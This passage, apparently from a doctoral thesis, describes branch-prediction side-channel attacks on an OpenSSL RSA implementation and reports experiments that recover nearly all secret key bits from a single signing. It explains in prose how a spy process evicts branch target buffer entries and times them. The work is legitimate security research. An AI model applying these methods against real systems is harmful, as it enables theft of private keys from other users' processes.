Any implementation that is vulnerable to the previous attack is also vulnerable to this one. Specifically any implementation of a cryptosystem is vulnerable
to this kind of attack if the execution flow is “key-dependent”. This attack, on
the other hand, is very easy to apply, because the adversary does not have to solve
the synchronization problem at all. Considering all these aspects of the current
attack, we can confidently say that it is a powerful and practical attack, which
puts many of the current public-key implementations in danger.
7.2. Practical Results
We also performed practical experiments to validate the aforementioned
attacks which exploit the branch predictor behavior of modern microprocessors.
Obviously, eviction-driven attacks using simultaneous multithreading are more
general, and demand nearly no knowledge about the underlying BPU — compared
to the other type of branch prediction attacks from above. Thus, we have chosen
123
to carry out our experimental attacks in a popular simultaneous multithreading
environment, cf. [91]. In this setting, an adversary can apply this kind of attacks
without any knowledge on the details of the used branch prediction algorithm and
BTB structure. Therefore we decided to implement our two asynchronous attacks
and show their results as a “proof-of-concept”.
7.2.1. Results for Attack 2 = Forcing the BPU to the Same Prediction (Asynchronous Attack)
In this kind of attack we have chosen, for reasons of simplicity and practical
significance, to implement the single and total eviction methods. We used a
dummy process that continuously evicts BTB entries by executing branches. This
process was simultaneously running with RSA on an SMT platform. It executed a
large number of branches and evicted each single BTB entry one at a time. This
method requires almost no information on the BTB structure. We performed
this attack on a very simple RSA implementation that employed square-andmultiply exponentiation and Montgomery multiplication with dummy reduction.
We used the RSA implementation in OpenSSL version 0.9.7e as a template and
made some modifications to convert this implementation into the simple one as
stated above. To be more precise, we changed the window size from 5 to 1,
turned blinding off, removed the CRT mode, and added the dummy reduction
step. The experiments were run under the configuration shown in Table 7.1. We
used random plaintexts generated by the rand() and srand() functions available
in the standard C library. The current time was fed into srand() function as
the pseudorandom number generation seed. We measured the execution time in
terms of clock cycles using the cycle counter instruction RDTSC, which is available
in user-level.
124
Operating System:
RedHat workstation 3
Compiler:
gcc version 3.2.3
Cryptographic Library: OpenSSL 0.9.7e
TABLE 7.1. The configuration used in the experiments
We generated 10 million random single-block messages and measured their
decryption times under a fixed 512-bit randomly generated key. In our analysis
phase, we eliminated the outliers and used only 9 million of these measurements.
We then processed each of these plaintext and divided them into the sets as explained in Section 7.1.1 and Section 7.1.2 based on the assumption of the next
unknown bit and the assumed outcome of the target branch. Hereafter we calculated the difference of the average execution time of the corresponding sets for
each bit of the key except the first two bits. The mean and the standard deviation
of these differences for correct and random separations of total eviction method
are given in the following Figure 7.1. This figure shows also on the right side,
the raw timing differences after averaging the 9 million measurements into one
single timing difference, where a single dot corresponds to the timing difference
of a specific exponent bit, i.e., the x-axis corresponds to the exponent bits from 2
to 511.
Using the values in Figure 7.1, we can calculate the probability of successful
prediction of any single key bit. We interpret the measured average execution
time differences for correct and random separation as realizations of normally
(Gaussian) distributed random variables, denoted by Y and X respectively. We
2
may assume Y ∼ N (µY , σY2 ) and X ∼ N (µX , σX
) for each bit of any possible
125
.
FIGURE 7.1. Practical results when using the total eviction method in attack
principle 2.
126
key, where µY = 58.91, µX = 1.24, σY = 62.58, and σX = 34.78, c.f. Figure 7.1.
We then introduce the normally distributed random variable Z as the difference
between realizations of X and Y , i.e., Z = Y − X and Z ∼ N (µZ , σZ2 ). The mean
and deviation of Z can be calculated from those of X and Y as
µZ = µY − µX = 58.91 − 1.24 = 57.67
q
p
2
= (62.58)2 + (34.78)2 = 71.60
σZ = σY2 + σX
As our decision strategy is to pick that assumption of the bit value that yields
the highest execution time difference between the sets we constructed under that
assumption, our decision will be correct whenever Z > 0. The probability for this
realization, Pr[Z > 0], can be determined by using the z-distribution table, i.e.,
Pr[Z > 0] = Φ((0 − µZ )/(σZ )) = Φ(−0.805) = 0.79,
which shows that our decisions will be correct with probability 0.79 if we use
N = 10 million samples. Although we could increase this accuracy by increasing
the sample size, this is not necessary. If we have a wrong decision for a bit,
both of the separations will be random-like afterwards and we will only encounter
relatively insignificant differences between the separations. Therefore, it is possible
to detect an error and recover from a wrong decision without necessarily increasing
the sample size.
Similarly, Figure 7.2 shows single eviction method results. Since the resolution is much higher in single eviction method, as an expected consequence, it
is much efficient than the total eviction method. A similar calculation as above
points a success rate of 89%.
127
.
FIGURE 7.2. Practical results when using the single eviction method in attack
principle 2.
7.2.2. Results for Attack 4 = Trace-driven Attack against the
BTB (Asynchronous Attack)
To practically test attack 4, which is also an asynchronous attack, we
used a very similar experimental setup that is described above. But, instead
of a dummy process that blindly evicts the BTB entries, we used a real spy
function. The spy-process evicted the BTB entries by executing branches just
like the dummy process. Additionally, it also measured the execution time of
these branches. More precisely, it only evicted the entries in the BTB-set that
contains the target address of the RSA branch under attack and reported the
timing measurements. In this experiment, we examined the execution of the
conditional branch in the exponentiation routine and not the extra reduction
steps of Montgomery Multiplication.
128
We implemented the spy function in such a way that it only checks the
BTB at the beginning or early stages of each montgomery multiplication. Thus,
we get exactly one timing measurement per montgomery operation, i.e., multiplication or squaring. Therefore, we could achieve a relatively “clean” measurement
procedure. We ran our spy and the cipher process N many times, where N is
the sample size. Then we averaged the timing results taken from our spy to decrease the noise amplitude in the measurements. The resulting graph shown in
Figure 7.3 presents our first results for different values of N — clearly visualizing
the difference between squaring and multiplication.
.
FIGURE 7.3. Increasing gap between multiplication and squaring steps due to
missing BTB entries.
As said above, one can deduce very clearly from Figure 7.3 that there
is a stabilizing significant cycle difference between multiplication and squaring
steps during the exponentiation. Now, that we have verified this BPU-related
gap between the successive multiplication and squaring steps during the exponentiation, we want to show now, how simple it is to retrieve the secret key with
this attack principle 4. To do this, we simply zoom into the following Figure 7.4
129
with N = 10000 measurements. This yields then the picture on the bottom of
Figure 7.4, showing from 89th to 104th montgomery operations for N = 10000
measurements. Once such a sequence of multiplications and squarings is captured, it is a trivial task to translate this sequence to the actual values of the key
bits.
We would like to remark that the sample size of 10000 measurements
might appear quite high at first sight. But using some more sophisticated tricks
(which are out of the scope of the present paper) we could have a meaningful
square/multiply cycle gap using only a few measurements.
7.3. Conclusions and recommendations for further research
Along the theme of the recent research efforts to explore software sidechannels attacks against commodity PC platforms, we have identified the branch
prediction capability of modern microprocessors as a new security risk which has
not been known so far. Using RSA, the most popular public encryption/signature
scheme, and its most popular open source implementation, openSSL, we have
shown that there are various attack scenarios how an attacker could exploit a
CPU’s branch prediction unit. Also, we have successfully implemented a very
powerful attack (Attack 4 = Trace-driven Attack against the BTB which even
has the power to break prominent side-channel security mechanisms like those
proposed by [52, 105]). The practical results from our experiments should be
encouraging to think about efficient and secure software mitigations for this kind of
new side-channel attacks. As an interesting countermeasure the following branchless exponentiation method, also known as “atomicity” from [26] comes to our
mind.
130
Another interesting research vector might be the idea to apply Branch
Prediction Attacks to symmetric ciphers. Although this seems at first sight a bit
odd, we would like to point out that an early study of [44] also applied the Timing Attack scenario of Kocher [59] to certain DES implementations and identified
branches in the respective DES implementations as a potential source of information leakage. Paired with our improved understanding of branches and their
potential information leakage of secrets, it might be a valid idea, to try Branch
Prediction Attacks along the ideas of [44].
Similar to other very recent software side-channel attacks against RSA
and AES, c.f. [80, 67, 73, 5], our practically simplest attacks rely on a CPU’s
Simultaneous Multi-Threading (SMT) capability, c.f. [91]. While SMT seems at
first sight a necessary requirement of our asynchronous attacks, we strongly believe
that this is just a matter of clever and deeper system’s programming capabilities
and that this requirement could be removed along some ideas as mentioned in [48,
73]. Thus, we think it is of highest importance to repeat our asynchronous branch
prediction attacks also on non-SMT capable CPU’s.
131
.
FIGURE 7.4. Connecting the spy-induced BTB misses and the square/multiply
cycle gap.
132
8. ON THE POWER OF SIMPLE BRANCH PREDICTION
ANALYSIS
Deep CPU pipelines paired with the CPU’s ability to fetch and issue multiple instructions at every machine cycle led to the concept of superscalar processors.
Superscalar processors admit a theoretical or best-case performance of less than
1 machine cycle per completed instructions, c.f. [92]. However, the inevitably required branch instructions in the underlying machine languages were very soon
recognized as one of the most painful performance killers of superscalar processors. Not surprisingly, CPU architects quickly invented the concept of branch
predictors in order to circumvent those performance bottlenecks. Thus, it is not
surprising that there has been a vibrant and very practical research on more and
more sophisticated branch prediction mechanisms, c.f. [78, 91, 92]. Unfortunately
we identify branch prediction as a novel and unforeseen side-channel, thus being
another new security threat within the computer security field, c.f. Chapter 7.
We just recently discovered that the branch prediction capability, common
to all modern high-end CPU’s, is another new side-channel posing a novel and
unforeseen security risk. In [1, 7] and Chapter 7, we present different branch
prediction attacks on simple RSA implementations as a case study to describe
the basics of the novel attacks an adversary can use to compromise the security
of a platform. In order to do so, we gradually develop from an obvious attack
principle more and more sophisticated attack principles, resulting in four different
scenarios. To demonstrate the applicability of these attacks, we complement these
scenarios by showing the results of selected practical implementations of various
attack scenarios, c.f. Section 7.2.
Irrespectively of our achievements, it is obvious that all of these attacks
still have the flavor of a classical timing attack against RSA. Indeed, careful ex-
133
amination of these four attacks shows that they all require many measurements
to finally reveal the secret key. In a timing attack, the key is obtained by taking
many execution time-measurements under the same key in order to statistically
amplify some small but key-dependent timing differences, cf. [59, 34, 85]. Thus,
simply eliminating the deterministic time-dependency of the RSA signing process
of the underlying key by very well understood and also computationally cheap
methods like message blinding or secret exponent masking, c.f. [59], such statistical attacks are easy to mitigate. Therefore, it is quite natural that such timing
attacks cause no real threat to the security of PC platforms.
Unfortunately, our results presented in this chapter teach us that this “let’s
think positive and relax” assumption is quite wrong! Namely, we dramatically improve upon the former result of [7] in the following sense. We prove that a carefully
written spy-process running simultaneously with an RSA-process is able to collect
during one single RSA signing execution almost all of the secret key bits. We call
such an attack, analyzing the CPU’s Branch Predictor states through spying on
a single quasi-parallel computation process, a Simple Branch Prediction Analysis
(SBPA) attack. In order to clearly differentiate those branch prediction attacks
that rely on statistical methods and require many computation measurements under the same key, we call those Differential Branch Prediction Analysis (DBPA)
attacks. However, additional to that very crucial security implication — SBPA
is able to break even such implementations which are assumed to be at least statistically secure — our successful SBPA attack also bears another equally critical
security implication. Namely, in the context of simple side-channel attacks, it is
widely believed that equally balancing the operations after branches is a secure
countermeasure against such simple attacks, c.f. [52]. Unfortunately, this is not
134
true, as even such “balanced branch” implementations can be completely broken
by our SBPA attacks.
8.1. Multi-Threading, spy and crypto processes
With the advent of the papers from [73, 80] a new and very interesting attack paradigm was initiated. This relies on the massive multi-threading
(quasi-parallel) capabilities of modern CPU’s, whether hardware-managed or OSmanaged, c.f. [67]. While purely single-threaded processors run threads/processes
serial, the OS manages to execute several programs in a quasi-parallel way, c.f.
[93]. The OS basically decomposes an application into a series of short threads
that are ordered with other application threads. On the other side, there are also
certain processors, so called hardware-assisted multi-threaded CPU’s, which enable a much finer-grained quasi-parallel execution of threads, c.f. [92, 91]. Here,
some “cheap” CPU resources are explicitly doubled (tripled, etc.), while some
others are temporarily shared. It allows them to have two or many other processes running quasi parallel on the same processor, as if there were two or more
logical processors [92, 93]. This allows then indeed a fine-grained instruction-level
multi-threading, c.f. [92].
Irrespectively of single-threaded or hardware-assisted multi-threaded, some
logical elements are always shared, which enables one process to spy on another
process, as the shared CPU elements leak some so called metadata, c.f. [73]. Of
course, the sharing of the resources does not allow a direct reading of the other
applications data, as the memory protection unit (MMU or Virtual Machine)
strictly enforces an application memory separation. One such example of a shared
135
element, which is the central point of interest for this chapter is the highly complex
BPU of modern CPU’s.
The new paradigm put forward by [73, 80], although already implicitly
pointed out by Hu [48], consists of quasi-parallel processes, called spy process and
crypto process. As the name suggest, the spy process tries to infer some secret
data from the parallel executed crypto process by observing the leaked metadata.
In the most extreme and most practical scenario, both processes run completely
independently of each other, and this scenario was termed asynchronous attack
by [73].
Given the very complex process structures and their handling by a modern
OS, cf. [93], the following heuristic is quite obvious.
A hardware-assisted multi-threading CPU will simplify a successful spy process, as:
1. Some inevitable “noise” due to the respective thread switches will be
absorbed by the CPU’s hardware-assistance.
2. The instruction-level threading capability enhances the time-resolution
of the spy-process.
In the other case, one needs a very sophisticated OS expertise and a deep thread
scheduling expertise, cf. [67]. As the above paradigm and all its subtle implementation details heavily depend on the underlying OS, CPU type and frequency,
etc. we will not deepen further those technical details here, and just assume the
existence of a suited spy process and a corresponding crypto process in a hardwareassisted multi-threading environment.
136
8.2. Improving Trace-driven Attacks against the BTB
In this section, we present our improvement over the DBPA attack from
[7], which we outlined in the last section. However, in order to logically derive
our final successful SBPA result against some version of the binary square and
multiply exponentiation for RSA, we have to investigate the situation a bit deeper.
If we consider Figure 7.4, we can certainly draw the conclusion that from
spy processes like this, there is no hope for a successful SBPA. At first sight, this
looks quite astonishing for the following reason. In a certain sense, the tracedriven attack against the BTB from [7] is similar to the cache eviction attacks of
[80, 73, 67]. In these attacks, a spy process is also continuously testing through
timing measurements which of its private data had been evicted by the crypto
process. And especially in the RSA OpenSSL 9.7 case from [80], the measurement
quality was high enough to get lots of secret key bits by spying on one single
exponentiation, i.e., inferring by simple time measurements which data the crypto
process had loaded into the data cache, to perform the RSA signing operation.
However, there is one fundamental difference, setting BPA attacks apart
from pure data cache eviction attacks. Attacking the BTB, although being itself acting like a simple cache, is actually targeting the instruction flow, which is
magnitudes more complicated than the data flow within the memory hierarchy,
i.e., between the L1 data cache and the main memory. Numerous architectural
enhancements take care that a deeply pipelined superscalar CPU like Pentium 4
cannot get too easily stalled by a BTB miss. When considering just (and what is
publicly known) the Front-End Instruction Pipeline Stages between the Instruction Prefetching Unit and the resulting feeding into the so called µop Queue, as
137
.
FIGURE 8.1. Front-End Instruction Pipeline Stages feeding the µop Queue
shown in the Figure 8.1 below, we recognize that only this Front-End Instruction
path is much more complicated than the data flow path, c.f. [91].
If we inspect the above Figure 8.1 in more depth, we can recognize that the
Pentium 4 has two different BTB’s: a Front-End BTB and a Trace-Cache BTB.
As the architectural reasons for this second Trace-cache BTB are out of interest
for this paper, we refer the interested readers to citeS05:Modern,RBS96:Trace.
However, more interesting is the information on their sizes, and especially their
joint functionality which we can partially learn from [91, pp. 913-914]: The travels
138
of a conditional branch instruction. The Front-End BTB has a size of 4096 entries,
whereas the Trace-Cache BTB has only a size of 512 entries, i.e., the Front-End
BTB is a superset of the Trace-Cache BTB.
The most interesting fact that we can draw from this doubled BTB is the
following. Executing a certain sequence of branches in the spy process which
evicts just the Front-End BTB might not necessarily suffice to completely enforce
the CPU not to find the target address of the target branch in some of the BTB’s,
so that the prediction must be not-taken. A certain hidden interaction between
Front-End BTB and Trace-Cache BTB might allow for some “short-term” victim
address evictions, but still store the target branch in one of the BTB’s .
Thus, we let the spy process continuously do the following. Execute continuously a certain fixed sequence of a number of, say t many, branches to evict
the target branch’s entry out of BTB and measure the overall execution time of
all these branches. This is exactly what is done in our earlier attack except a
single difference, which transforms our trace-driven attack from a DBPA attack
into an extremely powerful SBPA attack. The optimal number of t turns out to
be significantly larger than the exact number of associativity, which is the value
used in our previous attack, c.f. [7] and Chapter 7. The increased value for t
guarantees the eviction of the target entry from all different places that can store
it, e.g., from both Front-End BTB and Trace-Cache BTB.
The value of t also affects the cycle gap between squaring and multiplication
in the following way. As mentioned in the previous section, when the target branch
is evicted from the BTB and the branch turns out to be taken, then a misprediction
will occur and the target address of the branch needs to be stored in BTB. Then,
one of the spy branches has to be evicted from the BTB so that the new target
139
address can be stored in. When the spy-process re-executes its branches, it will
encounter a misprediction on the branch that has just been evicted.
A fact that is not mentioned above is that this misprediction will also
trigger further mispredictions since the entry of the evicted spy branch needs to
be re-stored and another not-yet-reexecuted spy branch entry has to be evicted,
which will also cause other mispredictions. At the end, the execution time of this
spy step is expected to suffer from many misprediction delays resulting a high
gap between squaring and multiplication. However, this scenario only works out
if the entries are completely evicted from all possible locations. As can be seen in
Figure 7.4, the gap is only 20 cycles in the previous attack, which indicates that
the above scenario is not valid for this particular attack, to be more precise, to
this value of t. Increasing t to its optimal value also enforces our scenario and
guarantees a very large gap composed of several misprediction delays. This fact
is clear considering the gap around 1000 cycles in our SBPA attack, i.e. improved
trace-driven attack.
The optimal value of t is eventually machine dependent and (most likely)
also depends on the particular set of software, i.e. OS, running on the machine.
Therefore, an adversary needs to tune, e.g. empirically determine the optimal t
value, the spy process on the attack machine.
8.3. Practical Results
To validate our aforementioned enhanced “BTB eviction strategy”, we performed some practical experiments. As usual in this context, we have chosen to
carry out our experimental attacks in a popular simultaneous multithreading environment, c.f. [91], as this CPU type simplifies the context switching between
140
the spy and the crypto process. In our above outlined setting, the adversary can
apply this asynchronous attack without any knowledge on the details of the used
branch prediction algorithm or any deeper BTB structure knowledge.
As in our previous Branch Prediction attacks, we performed this attack on
a very simple RSA implementation that employed a square-and-multiply exponentiation and also Montgomery multiplication with dummy reduction. We used
the RSA implementation from OpenSSL version 0.9.7e as a template and made
some modifications to convert this implementation into the simple one as stated
above. To be more precise, we changed the window size from 5 to 1, removed the
CRT mode, and added the dummy reduction step. We used random plaintexts
generated by the rand() and srand() functions, as available in the standard C
library, and measured the execution time in terms of clock cycles using the cycle
counter instruction RDTSC, which is available in user-level.
An experimental results of this enhanced “BTB eviction strategy” for RSAsign with a 512 bit key-length are shown in the following Figure 8.2.
As recognizable from the above Figure 8.2, our repeated spy-execution of a
certain fixed sequence of branches certainly enhanced the resolution for one single
RSA-sign measurement. Indeed, comparing Figure 8.2 with Figure 7.4 we can
say that this simple trick “saved” an averaging of about 1000 to 10000 different
measurements. However, although the results shown in Figure 8.2 weaken the
strength of the key tremendously, they do not give us enough information to
break the RSA key easily.
On an average PC (client or server) running Windows, Linux, etc. there are
many quasi-parallel processes running, whether system-processes or user-initiated
processes. The time when such processes are running can be assumed to be
random and it heavily influences the timing-behavior of every other process, for
141
.
FIGURE 8.2. Results of SBPA with an improved resolution.
142
e.g., our spy and crypto process. Therefore, there is a statistical chance to perform
some of our measurements during a timeframe when such influences are minimal,
which leads us to our following heuristic:
there must exist among all those measurements also some quite “clear”
measurements.
We call this argument the time-dependent random self-improvement heuristic.
Applying this heuristic simply means that we just have to do some SBPA measurements, say at several independent times, and we can be sure that among those
there will be at least “one unusually good” individual measurement, which will
be our final SBPA. To validate this heuristic, we performed then ten different
“random” SBPA attacks on the same 512 bit key. The results are given in Figure
8.3. Without doubt, there are quite different results among them although they
process the same key, thus supporting our heuristic quite well.
And indeed, the following experimental result, also being among those
ten measurements, clearly shows that there is one exceptionally clear one, which
directly reveals almost all of the secret key bits.
Armed with this final experimental result, we safely can claim that we have
lifted our work of [7] to the much more powerful SBPA area.
8.4. Conclusions
Branch Prediction Analysis (BPA), which recently led to a new software
side-channel attack, still had the flavor of classical timing attacks against RSA.
Timing attacks use many execution-time measurements under the same key in order to statistically amplify some small but key-dependent timing differences. We
have dramatically improved our former results presented in [7, 1] and the previous
143
.
FIGURE 8.3. Enhancing a bad resolution via independent repetition.
144
.
FIGURE 8.4. Best result of our SBPA against openSSL RSA, yielding 508 out
of 512 secret key bits.
145
chapter and showed that a carefully written spy-process running simultaneously
with an RSA-process, is able to collect during one single RSA signing execution
almost all of the secret key bits. We call this attack, analyzing the CPU’s Branch
Predictor states through spying on a single quasi-parallel computation process,
a Simple Branch Prediction Analysis (SBPA) attack — sharply differentiating it
from those one relying on statistical methods and requiring many computation
measurements under the same key. The successful extraction of almost all secret
key bits by our SBPA attack against an OpenSSL RSA implementation proves
that the often recommended blinding or so called randomization techniques to
protect RSA against side-channel attacks are, in the context of SBPA attacks, totally useless. Additional to that very crucial security implication, targeted at such
implementations which are assumed to be at least statistically secure, our successful SBPA attack also bears another equally critical security implication. Namely,
in the context of simple side-channel attacks, it is widely believed that equally
balancing the operations after branches is a secure countermeasure against such
simple attacks. Unfortunately, this is not true, as even such “balanced branch” implementations can be completely broken by our SBPA attacks. Moreover, despite
sophisticated hardware-assisted partitioning methods such as memory protection,
sandboxing or even virtualization, SBPA attacks empower an unprivileged process
to successfully attack other processes running in parallel on the same processor.
Thus, we conclude that SBPA attacks are much more dangerous than previously
anticipated, as they obviously do not belong to the same category as pure timing
attacks.
More importantly, since our new attack requires only one single execution observation, and thus significantly differs from the earlier timing attacks,
the SBPA discovery opens new and very interesting application areas. It espe-
146
cially endangers those cryptographic/algorithmic primitives, whose nature is an
intrinsic and input dependent branching process. Here, we especially target the
modular reduction and the modular inversion part. In practical implementations
of popular cryptosystems, they are often used in such cases, where one parameter
of the respective algorithm (i.e., modular reduction or modular inversion) is an
important secret parameter of the underlying cryptosystem. Let us briefly mention a few but important situations for reduction and inversion, where a successful
SBPA attack can lead to a serious security compromise.
• Modular reduction (mod p and mod q) is used in the initial normalization
process of RSA when using the Chinese Remainder Theorem, c.f. [64]. And
indeed, [51, 53] already pointed out that the classical pencil and paper division algorithm could leak through certain side channels the secret knowledge
of p and q.
• Inversion is also very often used as a statistical side channel attack countermeasure to blind messages during RSA signature computations, cf. [59, 85],
thus effectively combating classical timing attacks, cf. [21].
• Inversion is the main ingredient during the RSA key generation set-up to
compute the secret exponent from the public exponent and the totient function of the respective RSA modulus.
• Inversion is also used in the (EC)DSA, cf. [64], and just the leakage of a few
secret bits of the respective ephemeral keys, cf. [47, 69, 70], leads to a total
break of the (EC)DSA.
Classical timing attacks cannot compromise such operations solely because
they rely on capturing many measurements and statistical analysis with the same
147
input parameters, whereas the above situations execute the reduction or inversion
part only once for a specific input set. We feel that our findings will eventually
result in a serious revision of current software for various public-key cryptosystem
implementations, and that there will arise a new research vector along our results.
148
9. CONCLUSION
Side-channel cryptanalysis has attracted significant attention since
Kocher’s discoveries of timing and power analysis attacks [59, 60]. The classical
cryptography, which analyzes the cryptosystems as perfect mathematical objects
and ignores the physical analysis of the implementations, fails to identify sidechannel leakages. Therefore it is inevitable to utilize both classical cryptography
and side-channel cryptanalysis in order to develop and implement secure systems.
The initial focus of side-channel research was on smart card security. Smart
cards are used for identification or financial transactions and therefore need builtin security features. They store secret values inside the card and they are especially
designed to protect and process these secret values. The recent promises from
Trusted Computing community indicate the security assurance of storing such
secret values in PC platforms, c.f. [99]. These promises have made the side-channel
analysis of PC platforms as desirable as that of smart cards.
We have seen an increased research effort on the security analysis of the
daily life PC platforms from the side-channel point of view. Here, it has been
especially shown that the functionality of the common components of processor
architectures creates an indisputable security risk, c.f. [1, 2, 5, 14, 73, 80], which
comes in different forms. Although the cache itself has been known for a long time
being a crucial security risk of modern CPU’s, c.f. [95, 48], [5, 14, 73, 80] were
the first proving such vulnerabilities practically and raised large public interest in
such vulnerabilities. These advances initiated a new research vector to identify,
analyze, and mitigate the security vulnerabilities that are created by the design
and implementation of processor components.
149
Especially in the light of ongoing Trusted Computing efforts, c.f. [99], which
promise to turn the commodity PC platform into a trustworthy platform, c.f. also
[25, 35, 42, 79, 99, 103], the formerly described side channel attacks against PC
platforms have significant importance. This is due to the fact that side channel
attacks have been completely ignored by the Trusted Computing community so
far.
Even more interesting is the fact that all of the above pure software side
channel attacks also allow a totally unprivileged process to attack other processes
running in parallel on the same processor (or even remote), despite sophisticated
partitioning methods such as memory protection, sandboxing or even virtualization. This particularly means that side channel attacks render all of the sophisticated protection mechanisms as for (e.g.) described in [42, 103] as useless. The
simple reason for the failure of these trust mechanisms is that the new side-channel
attacks simply exploit deeper processor ingredients that are below the trust architecture boundary, c.f. [81, 42].
In this thesis, we have focused on side-channel cryptanalysis of cryptosystems on commodity computer platforms. Especially, we have analyzed two main
CPU components, cache and branch prediction unit, from side-channel point of
view. We have shown that the functionalities of these two components create v ery
serious security risks in software systems, especially in software based cryptosystems.
We have presented the first realistic remote attack on computer systems,
which was developed by Brumley et al. [21], and proposed an improved version
of this original attack. Our proposals improve the efficiency of this attack by a
factor of more than 10.
150
Then we have presented current cache attacks in the literature to give the
reader a brief overview of the area. We also have introduced a new cache timing
attack on AES that can compromise remote systems. None of the cache attack
works could achieve the ultimate goal of devising a realistic remote attack. We
have discussed how one can devise and apply such a remote cache attack. We
have presented those ideas in Chapter 5 and showed how to use them to develop
a universal remote cache attack on AES. Our results prove that cache attacks
cannot be considered as pure local attacks and they can be applied to software
systems running over a network.
We have also analyzed trace-driven cache attacks, which are one of three
types of cache attacks identified so far. We have constructed an analytical model
for trace-driven attacks that enables one to analyze such attacks on different
implementations and different platforms, c.f. Chapter 6. We have developed very
efficient trace-driven attacks on AES and applied our model on those attacks as
a case study.
Furthermore, we have identified branch prediction units of modern computer systems as yet another unforeseen security risk even in the presence of recent
security promises for commodity platforms from the Trusted Computing area. We
have developed various attack techniques that rely on the functionality of branch
prediction units. We have showed that those attacks can practically extract the
secrets of public-key cryptosystems.
Moreover, we have showed that a carefully written spy-process running
simultaneously with an RSA-process, is able to collect during one single RSA
signing execution almost all of the secret key bits. We call this attack, analyzing
the CPU’s Branch Predictor states through spying on a single quasi-parallel computation process, a Simple Branch Prediction Analysis (SBPA) attack — sharply
151
differentiating it from those one relying on statistical methods and requiring many
computation measurements under the same key.
The successful extraction of almost all secret key bits by our SBPA attack against an OpenSSL RSA implementation proves that the often recommended blinding or so called randomization techniques to protect RSA against
side-channel attacks are, in the context of SBPA attacks, totally useless.
Additional to that very crucial security implication, targeted at such implementations which are assumed to be at least statistically secure, our successful
branch prediction attacks also bear another equally critical security implication.
Namely, in the context of simple side-channel attacks, it is widely believed that
equally balancing the operations after branches is a secure countermeasure against
such simple attacks. Unfortunately, this is not true, as even such “balanced
branch” implementations can be completely broken by our attacks. Moreover,
despite sophisticated hardware-assisted partitioning methods such as memory protection, sandboxing or even virtualization, SBPA attacks empower an unprivileged
process to successfully attack other processes running in parallel on the same processor. Thus, we conclude that branch prediction attacks are extremely dangerous,
as they obviously do not belong to the same category as pure timing attacks.
More importantly, since our new attack requires only one single execution observation, and thus significantly differs from the earlier timing attacks,
the SBPA discovery opens new and very interesting application areas. It especially endangers those cryptographic/algorithmic primitives, whose nature is an
intrinsic and input dependent branching process. Here, we especially target the
modular reduction and the modular inversion part. In practical implementations
of popular cryptosystems, they are often used in such cases, where one parameter
152
of the respective algorithm (i.e., modular reduction or modular inversion) is an
important secret parameter of the underlying cryptosystem.
The potential cache based security vulnerabilities have been known for a
long time, even though actual cache attacks were not implemented until recently.
There are many countermeasures that were proposed to prevent cache attacks
before 2005. However, there is not any hint in the literature pointing branch
prediction out as a potential side channel attack source. As a consequent of this,
there was not any effort to develop mitigation methods against branch prediction
attacks. Eventually, we have developed several mitigations against this particular
security vulnerability. Branch prediction attacks also compromise secure systems
even in the presence of sophisticated partitioning techniques like memory protection and virtualization. Therefore it is crucial and inevitable to employ mitigation methods against the vulnerabilities we had identified in order to achieve the
promises of security critical technologies like virtualization.
We believe that our findings presented in this thesis will eventually result
in a serious revision of current software for various cryptosystem implementations,
and that there will arise new research vectors along our results.
153
BIBLIOGRAPHY
[1] O. Acıiçmez, Ç. K. Koç, and J.-P. Seifert. Predicting Secret Keys via Branch
Prediction. Topics in Cryptology — CT-RSA 2007, The Cryptographers’
Track at the RSA Conference 2007, M. Abe, editor, pages 225-242, SpringerVerlag, Lecture Notes in Computer Science series 4377, 2007.
[2] O. Acıiçmez, Ç. K. Koç, and J.-P. Seifert. On The Power of Simple Branch
Prediction Analysis. Cryptology ePrint Archive, Report 2006/351, October
2006.
[3] O. Acıiçmez and Ç. K. Koç. Trace-Driven Cache Attacks on AES. Cryptology
ePrint Archive, Report 2006/138, April 2006.
[4] O. Acıiçmez and Ç. K. Koç. Trace-Driven Cache Attacks on AES (Short
Paper). 8th International Conference on Information and Communications
Security — ICICS06, P. Ning, S. Qing, and N. Li, editors, pages 112-121,
Springer-Verlag, Lecture Notes in Computer Science series 4307, 2006.
[5] O. Acıiçmez, W. Schindler, and Ç. K. Koç. Cache Based Remote Timing
Attack on the AES. Topics in Cryptology — CT-RSA 2007, The Cryptographers’ Track at the RSA Conference 2007, M. Abe, editor, pages 271-286,
Springer-Verlag, Lecture Notes in Computer Science series 4377, 2007.
[6] O. Acıiçmez, W. Schindler, Ç. K. Koç. Improving Brumley and Boneh Timing Attack on Unprotected SSL Implementations. Proceedings of the 12th
ACM Conference on Computer and Communications Security, C. Meadows
and P. Syverson, editors, pages 139-146, ACM Press, 2005.
[7] O. Acıiçmez, J.-P. Seifert, and Ç. K. Koç. Predicting Secret Keys via Branch
Prediction. Cryptology ePrint Archive, Report 2006/288, August 2006.
[8] Advanced Encryption Standard (AES). Federal Information Processing
Standards Publication 197, 2001.
Available at http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
[9] AES Lounge. http://www.iaik.tugraz.at/research/krypto/AES/
[10] D. Agrawal, B. Archambeault, J. R. Rao, P. Rohatgi. The EM SideChannel(s). Cryptographic Hardware and Embedded Systems — CHES 2002,
B. S. Kaliski, Ç. K. Koç, and C. Paar, editors, pages 29-45, Springer-Verlag,
Lecture Notes in Computer Science series 2523, 2003.
[11] T. Austin, E. Larson, and D. Ernst. SimpleScalar: an infrastructure for
computer system modeling. IEEE Computer, volume 35, issue 2, pages 5967, February 2002.
154
[12] M. Bellare and P. Rogaway. Optimal asymmetric encryption — How to encrypt with RSA. Advances in Cryptology - EUROCRYPT ’94, Lecture Notes
in Computer Science, volume 950, Springer-Verlag, 1995, pp. 92-111.
[13] D. E. Bell and L. La Padula. Secure Computer Systems: Mathematical
Foundations and Model. Technical Report M74-244, MITRE Corporation,
1973.
[14] D. J. Bernstein. Cache-timing attacks on AES. Technical Report, 37 pages,
April 2005. Available at:
http://cr.yp.to/antiforgery/cachetiming-20050414.pdf
[15] G. Bertoni, V. Zaccaria, L. Breveglieri, M. Monchiero, G. Palermo. AES
Power Attack Based on Induced Cache Miss and Countermeasure. International Symposium on Information Technology: Coding and Computing ITCC 2005, volume 1, pages 4-6, 2005.
[16] D. Bleichenbacher. Chosen Ciphertext Attacks Against Protocols Based
on the RSA Encryption Standard PKCS #1. Advances in Cryptology CRYPTO ’98, H. Krawczyk, editor, pages 1-12, Springer-Verlag, Lecture
Notes in Computer Science series 1462, 1998.
[17] D. Boneh. Twenty years of attacks on the RSA cryptosystem. Notices of the
American Mathematical Society, volume 46, pp. 203-213, 1999.
Available at: http://www.ams.org/notices/199902/boneh.pdf
